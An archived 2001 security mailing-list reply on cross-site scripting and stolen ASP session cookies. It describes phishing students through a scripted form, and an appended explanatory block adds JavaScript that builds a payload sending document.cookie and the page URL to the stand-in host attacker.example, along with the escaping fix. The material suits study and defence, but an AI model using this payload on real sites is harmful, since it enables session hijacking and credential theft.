Vulnerability Development mailing list archives

Re: using stolen aspsession ids


From: dzzie () yahoo com
Date: Tue, 2 Oct 2001 15:29:16 -0500


corresponding real query string.  Wouldn't I need to connect to the server
with a cookie: ASPSESSIONIDxxx=xxxxxxx to webpath/script.asp?xxxxx and
know that ID after the question mark? This wouldn't be possible just
having the cookie, I don't think.

If you can grab the cookie by inserting script into the page, then
you can also grab the entire URL of the page it is on, including the
query string args, with the same script... try inserting a

alert(location.href)


Also, what other possibilities are there to exploit the cross-site
scripting hole? For example, if there was an error page that only the user
submitting the false URL can see, then what damage could be done?


One of the things with cross-site scripting is that it can fool people
into visiting a trusted URL. It may not even be an attack on your site...
just using your site to help exploit someone.

Something along the lines of me having a link to your site with some malicious
hex-encoded script on the end, so that when the user visits it (semi-trusting
that he is going to some mainstream site) he is actually exploited with
the script I got your server to echo to him, and it looks, at least from the
user's perspective, like it is your fault...

Not a biggie from a server security perspective... but what if the script wrote out
a nice-looking page of complete misinformation or some spammer's ad? There goes
your bandwidth, or the possibility of people believing some info came from a
trusted source...

Imagine someone mailing students that they had to change passwords and directing
them to a cross-site scripted form on one of your servers that submitted the
info to another server? Everything would look normal to the vast majority
of users.
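The two points the reply makes, that an injected script can read the cookie and location.href together, and that the vector is a "hex encoded" (percent-encoded) script tacked onto a link to a page that echoes its input, are spelled out below as an added example. This is not code from the thread or from any of its posters; the error page, the host names attacker.example and victim.example, the parameter name page, and the ASPSESSIONID value are all constructed for illustration. The same block also shows the fix on the echoing server (HTML-escaping before reflecting), which the thread implies but does not state.

```javascript
// Added example, not from the mailing-list thread. All hosts, paths, parameter
// names and the session id below are made up for illustration.

// Minimal HTML escaping for text inserted into an HTML body.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Stand-in for a server-side error page that echoes the requested path back
// to the user. With escape=false it reflects the input raw (the hole the
// thread discusses); with escape=true it HTML-escapes it first (the fix).
function renderErrorPage(requestedPath, { escape }) {
  const shown = escape ? escapeHtml(requestedPath) : requestedPath;
  return `<html><body><h1>Error</h1><p>The page ${shown} was not found.</p></body></html>`;
}

// The script the attacker wants echoed into the victim's page. It reads
// document.cookie (e.g. ASPSESSIONIDxxx=...) and location.href (path plus
// query string) and ships both to a collector via an image request, so the
// victim sees no navigation.
function buildExfilPayload(collectorUrl) {
  return (
    "<script>" +
    `new Image().src=${JSON.stringify(collectorUrl)}+"?c="+encodeURIComponent(document.cookie)` +
    `+"&u="+encodeURIComponent(location.href);` +
    "</script>"
  );
}

// The "hex encoded script on the end" of a trusted-looking link: the payload
// percent-encoded into a query parameter of the target site's error page.
function buildAttackLink(targetErrorUrl, payload) {
  return `${targetErrorUrl}?page=${encodeURIComponent(payload)}`;
}

// What the server sees after decoding the parameter it is about to echo.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// The request the collector receives once the payload runs in a browser,
// computed here without a browser so the whole flow is visible end to end.
function collectorRequest(collectorUrl, cookie, href) {
  return `${collectorUrl}?c=${encodeURIComponent(cookie)}&u=${encodeURIComponent(href)}`;
}

function demo() {
  const collector = "http://attacker.example/log";  // assumed attacker host
  const target = "http://victim.example/error.asp"; // assumed echoing page
  const payload = buildExfilPayload(collector);
  const link = buildAttackLink(target, payload);
  const echoed = queryParam(link, "page");
  return {
    link,
    vulnerable: renderErrorPage(echoed, { escape: false }), // script lands in the page
    fixed: renderErrorPage(echoed, { escape: true }),       // script shown as inert text
    leaked: collectorRequest(
      collector,
      "ASPSESSIONIDQQGGGQZC=ABCDEFGH",                     // constructed cookie value
      "http://victim.example/script.asp?id=42"             // constructed page URL
    ),
  };
}
```

Running demo() and printing the three strings shows the raw reflection containing a live `<script>` element, the escaped reflection containing only `&lt;script&gt;` text, and the collector URL carrying both the session cookie and the full URL of the page the victim was on, query string included. Note that the escaping here is only correct for text in an HTML body; a value echoed into an attribute, a URL or an inline script needs the encoding for that context.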
